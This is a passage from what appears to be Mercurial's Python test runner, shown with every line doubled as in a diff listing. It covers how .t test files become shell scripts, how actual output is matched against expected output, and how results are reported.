1730 )
1730 )
1731 activetrace[0:] = [quoted]
1731 activetrace[0:] = [quoted]
1732
1732
1733 script = []
1733 script = []
1734
1734
1735 # After we run the shell script, we re-unify the script output
1735 # After we run the shell script, we re-unify the script output
1736 # with non-active parts of the source, with synchronization by our
1736 # with non-active parts of the source, with synchronization by our
1737 # SALT line number markers. The after table contains the non-active
1737 # SALT line number markers. The after table contains the non-active
1738 # components, ordered by line number.
1738 # components, ordered by line number.
1739 after = {}
1739 after = {}
1740
1740
1741 # Expected shell script output.
1741 # Expected shell script output.
1742 expected = {}
1742 expected = {}
1743
1743
1744 pos = prepos = -1
1744 pos = prepos = -1
1745
1745
1746 # True or False when in a true or false conditional section
1746 # True or False when in a true or false conditional section
1747 skipping = None
1747 skipping = None
1748
1748
1749 # We keep track of whether or not we're in a Python block so we
1749 # We keep track of whether or not we're in a Python block so we
1750 # can generate the surrounding doctest magic.
1750 # can generate the surrounding doctest magic.
1751 inpython = False
1751 inpython = False
1752
1752
1753 if self._debug:
1753 if self._debug:
1754 script.append(b'set -x\n')
1754 script.append(b'set -x\n')
1755 if self._hgcommand != b'hg':
1755 if self._hgcommand != b'hg':
1756 script.append(b'alias hg="%s"\n' % self._hgcommand)
1756 script.append(b'alias hg="%s"\n' % self._hgcommand)
1757 if os.getenv('MSYSTEM'):
1757 if os.getenv('MSYSTEM'):
1758 script.append(b'alias pwd="pwd -W"\n')
1758 script.append(b'alias pwd="pwd -W"\n')
1759
1759
1760 if hgcatapult and hgcatapult != os.devnull:
1760 if hgcatapult and hgcatapult != os.devnull:
1761 if PYTHON3:
1761 if PYTHON3:
1762 hgcatapult = hgcatapult.encode('utf8')
1762 hgcatapult = hgcatapult.encode('utf8')
1763 cataname = self.name.encode('utf8')
1763 cataname = self.name.encode('utf8')
1764 else:
1764 else:
1765 cataname = self.name
1765 cataname = self.name
1766
1766
1767 # Kludge: use a while loop to keep the pipe from getting
1767 # Kludge: use a while loop to keep the pipe from getting
1768 # closed by our echo commands. The still-running file gets
1768 # closed by our echo commands. The still-running file gets
1769 # reaped at the end of the script, which causes the while
1769 # reaped at the end of the script, which causes the while
1770 # loop to exit and closes the pipe. Sigh.
1770 # loop to exit and closes the pipe. Sigh.
1771 script.append(
1771 script.append(
1772 b'rtendtracing() {\n'
1772 b'rtendtracing() {\n'
1773 b' echo END %(session)s %(name)s >> %(catapult)s\n'
1773 b' echo END %(session)s %(name)s >> %(catapult)s\n'
1774 b' rm -f "$TESTTMP/.still-running"\n'
1774 b' rm -f "$TESTTMP/.still-running"\n'
1775 b'}\n'
1775 b'}\n'
1776 b'trap "rtendtracing" 0\n'
1776 b'trap "rtendtracing" 0\n'
1777 b'touch "$TESTTMP/.still-running"\n'
1777 b'touch "$TESTTMP/.still-running"\n'
1778 b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
1778 b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
1779 b'> %(catapult)s &\n'
1779 b'> %(catapult)s &\n'
1780 b'HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n'
1780 b'HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n'
1781 b'echo START %(session)s %(name)s >> %(catapult)s\n'
1781 b'echo START %(session)s %(name)s >> %(catapult)s\n'
1782 % {
1782 % {
1783 b'name': cataname,
1783 b'name': cataname,
1784 b'session': session,
1784 b'session': session,
1785 b'catapult': hgcatapult,
1785 b'catapult': hgcatapult,
1786 }
1786 }
1787 )
1787 )
1788
1788
1789 if self._case:
1789 if self._case:
1790 casestr = b'#'.join(self._case)
1790 casestr = b'#'.join(self._case)
1791 if isinstance(casestr, str):
1791 if isinstance(casestr, str):
1792 quoted = shellquote(casestr)
1792 quoted = shellquote(casestr)
1793 else:
1793 else:
1794 quoted = shellquote(casestr.decode('utf8')).encode('utf8')
1794 quoted = shellquote(casestr.decode('utf8')).encode('utf8')
1795 script.append(b'TESTCASE=%s\n' % quoted)
1795 script.append(b'TESTCASE=%s\n' % quoted)
1796 script.append(b'export TESTCASE\n')
1796 script.append(b'export TESTCASE\n')
1797
1797
1798 n = 0
1798 n = 0
1799 for n, l in enumerate(lines):
1799 for n, l in enumerate(lines):
1800 if not l.endswith(b'\n'):
1800 if not l.endswith(b'\n'):
1801 l += b'\n'
1801 l += b'\n'
1802 if l.startswith(b'#require'):
1802 if l.startswith(b'#require'):
1803 lsplit = l.split()
1803 lsplit = l.split()
1804 if len(lsplit) < 2 or lsplit[0] != b'#require':
1804 if len(lsplit) < 2 or lsplit[0] != b'#require':
1805 after.setdefault(pos, []).append(
1805 after.setdefault(pos, []).append(
1806 b' !!! invalid #require\n'
1806 b' !!! invalid #require\n'
1807 )
1807 )
1808 if not skipping:
1808 if not skipping:
1809 haveresult, message = self._hghave(lsplit[1:])
1809 haveresult, message = self._hghave(lsplit[1:])
1810 if not haveresult:
1810 if not haveresult:
1811 script = [b'echo "%s"\nexit 80\n' % message]
1811 script = [b'echo "%s"\nexit 80\n' % message]
1812 break
1812 break
1813 after.setdefault(pos, []).append(l)
1813 after.setdefault(pos, []).append(l)
1814 elif l.startswith(b'#if'):
1814 elif l.startswith(b'#if'):
1815 lsplit = l.split()
1815 lsplit = l.split()
1816 if len(lsplit) < 2 or lsplit[0] != b'#if':
1816 if len(lsplit) < 2 or lsplit[0] != b'#if':
1817 after.setdefault(pos, []).append(b' !!! invalid #if\n')
1817 after.setdefault(pos, []).append(b' !!! invalid #if\n')
1818 if skipping is not None:
1818 if skipping is not None:
1819 after.setdefault(pos, []).append(b' !!! nested #if\n')
1819 after.setdefault(pos, []).append(b' !!! nested #if\n')
1820 skipping = not self._iftest(lsplit[1:])
1820 skipping = not self._iftest(lsplit[1:])
1821 after.setdefault(pos, []).append(l)
1821 after.setdefault(pos, []).append(l)
1822 elif l.startswith(b'#else'):
1822 elif l.startswith(b'#else'):
1823 if skipping is None:
1823 if skipping is None:
1824 after.setdefault(pos, []).append(b' !!! missing #if\n')
1824 after.setdefault(pos, []).append(b' !!! missing #if\n')
1825 skipping = not skipping
1825 skipping = not skipping
1826 after.setdefault(pos, []).append(l)
1826 after.setdefault(pos, []).append(l)
1827 elif l.startswith(b'#endif'):
1827 elif l.startswith(b'#endif'):
1828 if skipping is None:
1828 if skipping is None:
1829 after.setdefault(pos, []).append(b' !!! missing #if\n')
1829 after.setdefault(pos, []).append(b' !!! missing #if\n')
1830 skipping = None
1830 skipping = None
1831 after.setdefault(pos, []).append(l)
1831 after.setdefault(pos, []).append(l)
1832 elif skipping:
1832 elif skipping:
1833 after.setdefault(pos, []).append(l)
1833 after.setdefault(pos, []).append(l)
1834 elif l.startswith(b' >>> '): # python inlines
1834 elif l.startswith(b' >>> '): # python inlines
1835 after.setdefault(pos, []).append(l)
1835 after.setdefault(pos, []).append(l)
1836 prepos = pos
1836 prepos = pos
1837 pos = n
1837 pos = n
1838 if not inpython:
1838 if not inpython:
1839 # We've just entered a Python block. Add the header.
1839 # We've just entered a Python block. Add the header.
1840 inpython = True
1840 inpython = True
1841 addsalt(prepos, False) # Make sure we report the exit code.
1841 addsalt(prepos, False) # Make sure we report the exit code.
1842 script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
1842 script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
1843 addsalt(n, True)
1843 addsalt(n, True)
1844 script.append(l[2:])
1844 script.append(l[2:])
1845 elif l.startswith(b' ... '): # python inlines
1845 elif l.startswith(b' ... '): # python inlines
1846 after.setdefault(prepos, []).append(l)
1846 after.setdefault(prepos, []).append(l)
1847 script.append(l[2:])
1847 script.append(l[2:])
1848 elif l.startswith(b' $ '): # commands
1848 elif l.startswith(b' $ '): # commands
1849 if inpython:
1849 if inpython:
1850 script.append(b'EOF\n')
1850 script.append(b'EOF\n')
1851 inpython = False
1851 inpython = False
1852 after.setdefault(pos, []).append(l)
1852 after.setdefault(pos, []).append(l)
1853 prepos = pos
1853 prepos = pos
1854 pos = n
1854 pos = n
1855 addsalt(n, False)
1855 addsalt(n, False)
1856 rawcmd = l[4:]
1856 rawcmd = l[4:]
1857 cmd = rawcmd.split()
1857 cmd = rawcmd.split()
1858 toggletrace(rawcmd)
1858 toggletrace(rawcmd)
1859 if len(cmd) == 2 and cmd[0] == b'cd':
1859 if len(cmd) == 2 and cmd[0] == b'cd':
1860 rawcmd = b'cd %s || exit 1\n' % cmd[1]
1860 rawcmd = b'cd %s || exit 1\n' % cmd[1]
1861 script.append(rawcmd)
1861 script.append(rawcmd)
1862 elif l.startswith(b' > '): # continuations
1862 elif l.startswith(b' > '): # continuations
1863 after.setdefault(prepos, []).append(l)
1863 after.setdefault(prepos, []).append(l)
1864 script.append(l[4:])
1864 script.append(l[4:])
1865 elif l.startswith(b' '): # results
1865 elif l.startswith(b' '): # results
1866 # Queue up a list of expected results.
1866 # Queue up a list of expected results.
1867 expected.setdefault(pos, []).append(l[2:])
1867 expected.setdefault(pos, []).append(l[2:])
1868 else:
1868 else:
1869 if inpython:
1869 if inpython:
1870 script.append(b'EOF\n')
1870 script.append(b'EOF\n')
1871 inpython = False
1871 inpython = False
1872 # Non-command/result. Queue up for merged output.
1872 # Non-command/result. Queue up for merged output.
1873 after.setdefault(pos, []).append(l)
1873 after.setdefault(pos, []).append(l)
1874
1874
1875 if inpython:
1875 if inpython:
1876 script.append(b'EOF\n')
1876 script.append(b'EOF\n')
1877 if skipping is not None:
1877 if skipping is not None:
1878 after.setdefault(pos, []).append(b' !!! missing #endif\n')
1878 after.setdefault(pos, []).append(b' !!! missing #endif\n')
1879 addsalt(n + 1, False)
1879 addsalt(n + 1, False)
1880 # Need to end any current per-command trace
1880 # Need to end any current per-command trace
1881 if activetrace:
1881 if activetrace:
1882 toggletrace()
1882 toggletrace()
1883 return salt, script, after, expected
1883 return salt, script, after, expected
1884
1884
1885 def _processoutput(self, exitcode, output, salt, after, expected):
1885 def _processoutput(self, exitcode, output, salt, after, expected):
1886 # Merge the script output back into a unified test.
1886 # Merge the script output back into a unified test.
1887 warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
1887 warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
1888 if exitcode != 0:
1888 if exitcode != 0:
1889 warnonly = WARN_NO
1889 warnonly = WARN_NO
1890
1890
1891 pos = -1
1891 pos = -1
1892 postout = []
1892 postout = []
1893 for out_rawline in output:
1893 for out_rawline in output:
1894 out_line, cmd_line = out_rawline, None
1894 out_line, cmd_line = out_rawline, None
1895 if salt in out_rawline:
1895 if salt in out_rawline:
1896 out_line, cmd_line = out_rawline.split(salt, 1)
1896 out_line, cmd_line = out_rawline.split(salt, 1)
1897
1897
1898 pos, postout, warnonly = self._process_out_line(
1898 pos, postout, warnonly = self._process_out_line(
1899 out_line, pos, postout, expected, warnonly
1899 out_line, pos, postout, expected, warnonly
1900 )
1900 )
1901 pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
1901 pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
1902
1902
1903 if pos in after:
1903 if pos in after:
1904 postout += after.pop(pos)
1904 postout += after.pop(pos)
1905
1905
1906 if warnonly == WARN_YES:
1906 if warnonly == WARN_YES:
1907 exitcode = False # Set exitcode to warned.
1907 exitcode = False # Set exitcode to warned.
1908
1908
1909 return exitcode, postout
1909 return exitcode, postout
1910
1910
1911 def _process_out_line(self, out_line, pos, postout, expected, warnonly):
1911 def _process_out_line(self, out_line, pos, postout, expected, warnonly):
1912 while out_line:
1912 while out_line:
1913 if not out_line.endswith(b'\n'):
1913 if not out_line.endswith(b'\n'):
1914 out_line += b' (no-eol)\n'
1914 out_line += b' (no-eol)\n'
1915
1915
1916 # Find the expected output at the current position.
1916 # Find the expected output at the current position.
1917 els = [None]
1917 els = [None]
1918 if expected.get(pos, None):
1918 if expected.get(pos, None):
1919 els = expected[pos]
1919 els = expected[pos]
1920
1920
1921 optional = []
1921 optional = []
1922 for i, el in enumerate(els):
1922 for i, el in enumerate(els):
1923 r = False
1923 r = False
1924 if el:
1924 if el:
1925 r, exact = self.linematch(el, out_line)
1925 r, exact = self.linematch(el, out_line)
1926 if isinstance(r, str):
1926 if isinstance(r, str):
1927 if r == '-glob':
1927 if r == '-glob':
1928 out_line = ''.join(el.rsplit(' (glob)', 1))
1928 out_line = ''.join(el.rsplit(' (glob)', 1))
1929 r = '' # Warn only this line.
1929 r = '' # Warn only this line.
1930 elif r == "retry":
1930 elif r == "retry":
1931 postout.append(b' ' + el)
1931 postout.append(b' ' + el)
1932 else:
1932 else:
1933 log('\ninfo, unknown linematch result: %r\n' % r)
1933 log('\ninfo, unknown linematch result: %r\n' % r)
1934 r = False
1934 r = False
1935 if r:
1935 if r:
1936 els.pop(i)
1936 els.pop(i)
1937 break
1937 break
1938 if el:
1938 if el:
1939 if isoptional(el):
1939 if isoptional(el):
1940 optional.append(i)
1940 optional.append(i)
1941 else:
1941 else:
1942 m = optline.match(el)
1942 m = optline.match(el)
1943 if m:
1943 if m:
1944 conditions = [c for c in m.group(2).split(b' ')]
1944 conditions = [c for c in m.group(2).split(b' ')]
1945
1945
1946 if not self._iftest(conditions):
1946 if not self._iftest(conditions):
1947 optional.append(i)
1947 optional.append(i)
1948 if exact:
1948 if exact:
1949 # Don't allow line to be matches against a later
1949 # Don't allow line to be matches against a later
1950 # line in the output
1950 # line in the output
1951 els.pop(i)
1951 els.pop(i)
1952 break
1952 break
1953
1953
1954 if r:
1954 if r:
1955 if r == "retry":
1955 if r == "retry":
1956 continue
1956 continue
1957 # clean up any optional leftovers
1957 # clean up any optional leftovers
1958 for i in optional:
1958 for i in optional:
1959 postout.append(b' ' + els[i])
1959 postout.append(b' ' + els[i])
1960 for i in reversed(optional):
1960 for i in reversed(optional):
1961 del els[i]
1961 del els[i]
1962 postout.append(b' ' + el)
1962 postout.append(b' ' + el)
1963 else:
1963 else:
1964 if self.NEEDESCAPE(out_line):
1964 if self.NEEDESCAPE(out_line):
1965 out_line = TTest._stringescape(
1965 out_line = TTest._stringescape(
1966 b'%s (esc)\n' % out_line.rstrip(b'\n')
1966 b'%s (esc)\n' % out_line.rstrip(b'\n')
1967 )
1967 )
1968 postout.append(b' ' + out_line) # Let diff deal with it.
1968 postout.append(b' ' + out_line) # Let diff deal with it.
1969 if r != '': # If line failed.
1969 if r != '': # If line failed.
1970 warnonly = WARN_NO
1970 warnonly = WARN_NO
1971 elif warnonly == WARN_UNDEFINED:
1971 elif warnonly == WARN_UNDEFINED:
1972 warnonly = WARN_YES
1972 warnonly = WARN_YES
1973 break
1973 break
1974 else:
1974 else:
1975 # clean up any optional leftovers
1975 # clean up any optional leftovers
1976 while expected.get(pos, None):
1976 while expected.get(pos, None):
1977 el = expected[pos].pop(0)
1977 el = expected[pos].pop(0)
1978 if el:
1978 if el:
1979 if not isoptional(el):
1979 if not isoptional(el):
1980 m = optline.match(el)
1980 m = optline.match(el)
1981 if m:
1981 if m:
1982 conditions = [c for c in m.group(2).split(b' ')]
1982 conditions = [c for c in m.group(2).split(b' ')]
1983
1983
1984 if self._iftest(conditions):
1984 if self._iftest(conditions):
1985 # Don't append as optional line
1985 # Don't append as optional line
1986 continue
1986 continue
1987 else:
1987 else:
1988 continue
1988 continue
1989 postout.append(b' ' + el)
1989 postout.append(b' ' + el)
1990 return pos, postout, warnonly
1990 return pos, postout, warnonly
1991
1991
1992 def _process_cmd_line(self, cmd_line, pos, postout, after):
1992 def _process_cmd_line(self, cmd_line, pos, postout, after):
1993 """process a "command" part of a line from unified test output"""
1993 """process a "command" part of a line from unified test output"""
1994 if cmd_line:
1994 if cmd_line:
1995 # Add on last return code.
1995 # Add on last return code.
1996 ret = int(cmd_line.split()[1])
1996 ret = int(cmd_line.split()[1])
1997 if ret != 0:
1997 if ret != 0:
1998 postout.append(b' [%d]\n' % ret)
1998 postout.append(b' [%d]\n' % ret)
1999 if pos in after:
1999 if pos in after:
2000 # Merge in non-active test bits.
2000 # Merge in non-active test bits.
2001 postout += after.pop(pos)
2001 postout += after.pop(pos)
2002 pos = int(cmd_line.split()[0])
2002 pos = int(cmd_line.split()[0])
2003 return pos, postout
2003 return pos, postout
2004
2004
2005 @staticmethod
2005 @staticmethod
2006 def rematch(el, l):
2006 def rematch(el, l):
2007 try:
2007 try:
2008 # parse any flags at the beginning of the regex. Only 'i' is
2008 # parse any flags at the beginning of the regex. Only 'i' is
2009 # supported right now, but this should be easy to extend.
2009 # supported right now, but this should be easy to extend.
2010 flags, el = re.match(br'^(\(\?i\))?(.*)', el).groups()[0:2]
2010 flags, el = re.match(br'^(\(\?i\))?(.*)', el).groups()[0:2]
2011 flags = flags or b''
2011 flags = flags or b''
2012 el = flags + b'(?:' + el + b')'
2012 el = flags + b'(?:' + el + b')'
2013 # use \Z to ensure that the regex matches to the end of the string
2013 # use \Z to ensure that the regex matches to the end of the string
2014 if os.name == 'nt':
2014 if os.name == 'nt':
2015 return re.match(el + br'\r?\n\Z', l)
2015 return re.match(el + br'\r?\n\Z', l)
2016 return re.match(el + br'\n\Z', l)
2016 return re.match(el + br'\n\Z', l)
2017 except re.error:
2017 except re.error:
2018 # el is an invalid regex
2018 # el is an invalid regex
2019 return False
2019 return False
2020
2020
2021 @staticmethod
2021 @staticmethod
2022 def globmatch(el, l):
2022 def globmatch(el, l):
2023 # The only supported special characters are * and ? plus / which also
2023 # The only supported special characters are * and ? plus / which also
2024 # matches \ on windows. Escaping of these characters is supported.
2024 # matches \ on windows. Escaping of these characters is supported.
2025 if el + b'\n' == l:
2025 if el + b'\n' == l:
2026 if os.altsep:
2026 if os.altsep:
2027 # matching on "/" is not needed for this line
2027 # matching on "/" is not needed for this line
2028 for pat in checkcodeglobpats:
2028 for pat in checkcodeglobpats:
2029 if pat.match(el):
2029 if pat.match(el):
2030 return True
2030 return True
2031 return b'-glob'
2031 return b'-glob'
2032 return True
2032 return True
2033 el = el.replace(b'$LOCALIP', b'*')
2033 el = el.replace(b'$LOCALIP', b'*')
2034 i, n = 0, len(el)
2034 i, n = 0, len(el)
2035 res = b''
2035 res = b''
2036 while i < n:
2036 while i < n:
2037 c = el[i : i + 1]
2037 c = el[i : i + 1]
2038 i += 1
2038 i += 1
2039 if c == b'\\' and i < n and el[i : i + 1] in b'*?\\/':
2039 if c == b'\\' and i < n and el[i : i + 1] in b'*?\\/':
2040 res += el[i - 1 : i + 1]
2040 res += el[i - 1 : i + 1]
2041 i += 1
2041 i += 1
2042 elif c == b'*':
2042 elif c == b'*':
2043 res += b'.*'
2043 res += b'.*'
2044 elif c == b'?':
2044 elif c == b'?':
2045 res += b'.'
2045 res += b'.'
2046 elif c == b'/' and os.altsep:
2046 elif c == b'/' and os.altsep:
2047 res += b'[/\\\\]'
2047 res += b'[/\\\\]'
2048 else:
2048 else:
2049 res += re.escape(c)
2049 res += re.escape(c)
2050 return TTest.rematch(res, l)
2050 return TTest.rematch(res, l)
2051
2051
2052 def linematch(self, el, l):
2052 def linematch(self, el, l):
2053 if el == l: # perfect match (fast)
2053 if el == l: # perfect match (fast)
2054 return True, True
2054 return True, True
2055 retry = False
2055 retry = False
2056 if isoptional(el):
2056 if isoptional(el):
2057 retry = "retry"
2057 retry = "retry"
2058 el = el[: -len(MARK_OPTIONAL)] + b"\n"
2058 el = el[: -len(MARK_OPTIONAL)] + b"\n"
2059 else:
2059 else:
2060 m = optline.match(el)
2060 m = optline.match(el)
2061 if m:
2061 if m:
2062 conditions = [c for c in m.group(2).split(b' ')]
2062 conditions = [c for c in m.group(2).split(b' ')]
2063
2063
2064 el = m.group(1) + b"\n"
2064 el = m.group(1) + b"\n"
2065 if not self._iftest(conditions):
2065 if not self._iftest(conditions):
2066 # listed feature missing, should not match
2066 # listed feature missing, should not match
2067 return "retry", False
2067 return "retry", False
2068
2068
2069 if el.endswith(b" (esc)\n"):
2069 if el.endswith(b" (esc)\n"):
2070 if PYTHON3:
2070 if PYTHON3:
2071 el = el[:-7].decode('unicode_escape') + '\n'
2071 el = el[:-7].decode('unicode_escape') + '\n'
2072 el = el.encode('utf-8')
2072 el = el.encode('latin-1')
2073 else:
2073 else:
2074 el = el[:-7].decode('string-escape') + '\n'
2074 el = el[:-7].decode('string-escape') + '\n'
2075 if el == l or os.name == 'nt' and el[:-1] + b'\r\n' == l:
2075 if el == l or os.name == 'nt' and el[:-1] + b'\r\n' == l:
2076 return True, True
2076 return True, True
2077 if el.endswith(b" (re)\n"):
2077 if el.endswith(b" (re)\n"):
2078 return (TTest.rematch(el[:-6], l) or retry), False
2078 return (TTest.rematch(el[:-6], l) or retry), False
2079 if el.endswith(b" (glob)\n"):
2079 if el.endswith(b" (glob)\n"):
2080 # ignore '(glob)' added to l by 'replacements'
2080 # ignore '(glob)' added to l by 'replacements'
2081 if l.endswith(b" (glob)\n"):
2081 if l.endswith(b" (glob)\n"):
2082 l = l[:-8] + b"\n"
2082 l = l[:-8] + b"\n"
2083 return (TTest.globmatch(el[:-8], l) or retry), False
2083 return (TTest.globmatch(el[:-8], l) or retry), False
2084 if os.altsep:
2084 if os.altsep:
2085 _l = l.replace(b'\\', b'/')
2085 _l = l.replace(b'\\', b'/')
2086 if el == _l or os.name == 'nt' and el[:-1] + b'\r\n' == _l:
2086 if el == _l or os.name == 'nt' and el[:-1] + b'\r\n' == _l:
2087 return True, True
2087 return True, True
2088 return retry, True
2088 return retry, True
2089
2089
2090 @staticmethod
2090 @staticmethod
2091 def parsehghaveoutput(lines):
2091 def parsehghaveoutput(lines):
2092 '''Parse hghave log lines.
2092 '''Parse hghave log lines.
2093
2093
2094 Return tuple of lists (missing, failed):
2094 Return tuple of lists (missing, failed):
2095 * the missing/unknown features
2095 * the missing/unknown features
2096 * the features for which existence check failed'''
2096 * the features for which existence check failed'''
2097 missing = []
2097 missing = []
2098 failed = []
2098 failed = []
2099 for line in lines:
2099 for line in lines:
2100 if line.startswith(TTest.SKIPPED_PREFIX):
2100 if line.startswith(TTest.SKIPPED_PREFIX):
2101 line = line.splitlines()[0]
2101 line = line.splitlines()[0]
2102 missing.append(_bytes2sys(line[len(TTest.SKIPPED_PREFIX) :]))
2102 missing.append(_bytes2sys(line[len(TTest.SKIPPED_PREFIX) :]))
2103 elif line.startswith(TTest.FAILED_PREFIX):
2103 elif line.startswith(TTest.FAILED_PREFIX):
2104 line = line.splitlines()[0]
2104 line = line.splitlines()[0]
2105 failed.append(_bytes2sys(line[len(TTest.FAILED_PREFIX) :]))
2105 failed.append(_bytes2sys(line[len(TTest.FAILED_PREFIX) :]))
2106
2106
2107 return missing, failed
2107 return missing, failed
2108
2108
2109 @staticmethod
2109 @staticmethod
2110 def _escapef(m):
2110 def _escapef(m):
2111 return TTest.ESCAPEMAP[m.group(0)]
2111 return TTest.ESCAPEMAP[m.group(0)]
2112
2112
2113 @staticmethod
2113 @staticmethod
2114 def _stringescape(s):
2114 def _stringescape(s):
2115 return TTest.ESCAPESUB(TTest._escapef, s)
2115 return TTest.ESCAPESUB(TTest._escapef, s)
2116
2116
2117
2117
2118 iolock = threading.RLock()
2118 iolock = threading.RLock()
2119 firstlock = threading.RLock()
2119 firstlock = threading.RLock()
2120 firsterror = False
2120 firsterror = False
2121
2121
2122
2122
2123 class TestResult(unittest._TextTestResult):
2123 class TestResult(unittest._TextTestResult):
2124 """Holds results when executing via unittest."""
2124 """Holds results when executing via unittest."""
2125
2125
2126 # Don't worry too much about accessing the non-public _TextTestResult.
2126 # Don't worry too much about accessing the non-public _TextTestResult.
2127 # It is relatively common in Python testing tools.
2127 # It is relatively common in Python testing tools.
2128 def __init__(self, options, *args, **kwargs):
2128 def __init__(self, options, *args, **kwargs):
2129 super(TestResult, self).__init__(*args, **kwargs)
2129 super(TestResult, self).__init__(*args, **kwargs)
2130
2130
2131 self._options = options
2131 self._options = options
2132
2132
2133 # unittest.TestResult didn't have skipped until 2.7. We need to
2133 # unittest.TestResult didn't have skipped until 2.7. We need to
2134 # polyfill it.
2134 # polyfill it.
2135 self.skipped = []
2135 self.skipped = []
2136
2136
2137 # We have a custom "ignored" result that isn't present in any Python
2137 # We have a custom "ignored" result that isn't present in any Python
2138 # unittest implementation. It is very similar to skipped. It may make
2138 # unittest implementation. It is very similar to skipped. It may make
2139 # sense to map it into skip some day.
2139 # sense to map it into skip some day.
2140 self.ignored = []
2140 self.ignored = []
2141
2141
2142 self.times = []
2142 self.times = []
2143 self._firststarttime = None
2143 self._firststarttime = None
2144 # Data stored for the benefit of generating xunit reports.
2144 # Data stored for the benefit of generating xunit reports.
2145 self.successes = []
2145 self.successes = []
2146 self.faildata = {}
2146 self.faildata = {}
2147
2147
2148 if options.color == 'auto':
2148 if options.color == 'auto':
2149 self.color = pygmentspresent and self.stream.isatty()
2149 self.color = pygmentspresent and self.stream.isatty()
2150 elif options.color == 'never':
2150 elif options.color == 'never':
2151 self.color = False
2151 self.color = False
2152 else: # 'always', for testing purposes
2152 else: # 'always', for testing purposes
2153 self.color = pygmentspresent
2153 self.color = pygmentspresent
2154
2154
2155 def onStart(self, test):
2155 def onStart(self, test):
2156 """ Can be overriden by custom TestResult
2156 """ Can be overriden by custom TestResult
2157 """
2157 """
2158
2158
2159 def onEnd(self):
2159 def onEnd(self):
2160 """ Can be overriden by custom TestResult
2160 """ Can be overriden by custom TestResult
2161 """
2161 """
2162
2162
2163 def addFailure(self, test, reason):
2163 def addFailure(self, test, reason):
2164 self.failures.append((test, reason))
2164 self.failures.append((test, reason))
2165
2165
2166 if self._options.first:
2166 if self._options.first:
2167 self.stop()
2167 self.stop()
2168 else:
2168 else:
2169 with iolock:
2169 with iolock:
2170 if reason == "timed out":
2170 if reason == "timed out":
2171 self.stream.write('t')
2171 self.stream.write('t')
2172 else:
2172 else:
2173 if not self._options.nodiff:
2173 if not self._options.nodiff:
2174 self.stream.write('\n')
2174 self.stream.write('\n')
2175 # Exclude the '\n' from highlighting to lex correctly
2175 # Exclude the '\n' from highlighting to lex correctly
2176 formatted = 'ERROR: %s output changed\n' % test
2176 formatted = 'ERROR: %s output changed\n' % test
2177 self.stream.write(highlightmsg(formatted, self.color))
2177 self.stream.write(highlightmsg(formatted, self.color))
2178 self.stream.write('!')
2178 self.stream.write('!')
2179
2179
2180 self.stream.flush()
2180 self.stream.flush()
2181
2181
2182 def addSuccess(self, test):
2182 def addSuccess(self, test):
2183 with iolock:
2183 with iolock:
2184 super(TestResult, self).addSuccess(test)
2184 super(TestResult, self).addSuccess(test)
2185 self.successes.append(test)
2185 self.successes.append(test)
2186
2186
2187 def addError(self, test, err):
2187 def addError(self, test, err):
2188 super(TestResult, self).addError(test, err)
2188 super(TestResult, self).addError(test, err)
2189 if self._options.first:
2189 if self._options.first:
2190 self.stop()
2190 self.stop()
2191
2191
2192 # Polyfill.
2192 # Polyfill.
2193 def addSkip(self, test, reason):
2193 def addSkip(self, test, reason):
2194 self.skipped.append((test, reason))
2194 self.skipped.append((test, reason))
2195 with iolock:
2195 with iolock:
2196 if self.showAll:
2196 if self.showAll:
2197 self.stream.writeln('skipped %s' % reason)
2197 self.stream.writeln('skipped %s' % reason)
2198 else:
2198 else:
2199 self.stream.write('s')
2199 self.stream.write('s')
2200 self.stream.flush()
2200 self.stream.flush()
2201
2201
2202 def addIgnore(self, test, reason):
2202 def addIgnore(self, test, reason):
2203 self.ignored.append((test, reason))
2203 self.ignored.append((test, reason))
2204 with iolock:
2204 with iolock:
2205 if self.showAll:
2205 if self.showAll:
2206 self.stream.writeln('ignored %s' % reason)
2206 self.stream.writeln('ignored %s' % reason)
2207 else:
2207 else:
2208 if reason not in ('not retesting', "doesn't match keyword"):
2208 if reason not in ('not retesting', "doesn't match keyword"):
2209 self.stream.write('i')
2209 self.stream.write('i')
2210 else:
2210 else:
2211 self.testsRun += 1
2211 self.testsRun += 1
2212 self.stream.flush()
2212 self.stream.flush()
2213
2213
2214 def addOutputMismatch(self, test, ret, got, expected):
2214 def addOutputMismatch(self, test, ret, got, expected):
2215 """Record a mismatch in test output for a particular test."""
2215 """Record a mismatch in test output for a particular test."""
2216 if self.shouldStop or firsterror:
2216 if self.shouldStop or firsterror:
2217 # don't print, some other test case already failed and
2217 # don't print, some other test case already failed and
2218 # printed, we're just stale and probably failed due to our
2218 # printed, we're just stale and probably failed due to our
2219 # temp dir getting cleaned up.
2219 # temp dir getting cleaned up.
2220 return
2220 return
2221
2221
2222 accepted = False
2222 accepted = False
2223 lines = []
2223 lines = []
2224
2224
2225 with iolock:
2225 with iolock:
2226 if self._options.nodiff:
2226 if self._options.nodiff:
2227 pass
2227 pass
2228 elif self._options.view:
2228 elif self._options.view:
2229 v = self._options.view
2229 v = self._options.view
2230 subprocess.call(
2230 subprocess.call(
2231 r'"%s" "%s" "%s"'
2231 r'"%s" "%s" "%s"'
2232 % (v, _bytes2sys(test.refpath), _bytes2sys(test.errpath)),
2232 % (v, _bytes2sys(test.refpath), _bytes2sys(test.errpath)),
2233 shell=True,
2233 shell=True,
2234 )
2234 )
2235 else:
2235 else:
2236 servefail, lines = getdiff(
2236 servefail, lines = getdiff(
2237 expected, got, test.refpath, test.errpath
2237 expected, got, test.refpath, test.errpath
2238 )
2238 )
2239 self.stream.write('\n')
2239 self.stream.write('\n')
2240 for line in lines:
2240 for line in lines:
2241 line = highlightdiff(line, self.color)
2241 line = highlightdiff(line, self.color)
2242 if PYTHON3:
2242 if PYTHON3:
2243 self.stream.flush()
2243 self.stream.flush()
2244 self.stream.buffer.write(line)
2244 self.stream.buffer.write(line)
2245 self.stream.buffer.flush()
2245 self.stream.buffer.flush()
2246 else:
2246 else:
2247 self.stream.write(line)
2247 self.stream.write(line)
2248 self.stream.flush()
2248 self.stream.flush()
2249
2249
2250 if servefail:
2250 if servefail:
